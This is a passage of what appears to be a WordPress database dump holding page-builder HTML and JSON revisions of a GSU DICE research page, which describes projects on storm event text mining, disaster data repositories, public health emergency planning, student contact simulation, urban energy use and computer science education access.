Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:17:45','2023-09-29 15:17:45','',126,'https://gsudice.dataconn.net/?p=1557',0,'revision','',0),(1563,1,'2023-09-29 11:19:47','2023-09-29 15:19:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 7\",\"attrs\":{\"id\":\"about-7\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c47\",\"parentId\":\"126-c46\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c47\",\"index\":0,\"id\":\"126-c48\",\"partialId\":126,\"styleRef\":876,\"type\":\"content\",\"props\":{\"content\":\"DICE Data Repository\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c47\",\"index\":2,\"id\":\"126-c50\",\"partialId\":126,\"styleRef\":878,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: "Open Sans"; color: rgb(64, 85, 169);\\\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <\\/span><\\/p>\"}}],\"styleRef\":875,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c51\",\"parentId\":\"126-c46\",\"partialId\":126,\"styleRef\":879,\"type\":\"content\"}],\"id\":\"126-c46\",\"parentId\":\"126-c45\",\"partialId\":126,\"styleRef\":874,\"type\":\"content\"}],\"id\":\"126-c45\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":873,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',438,'https://gsudice.dataconn.net/?p=1563',0,'revision','',0),(1564,1,'2023-09-29 11:19:47','2023-09-29 15:19:47','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done 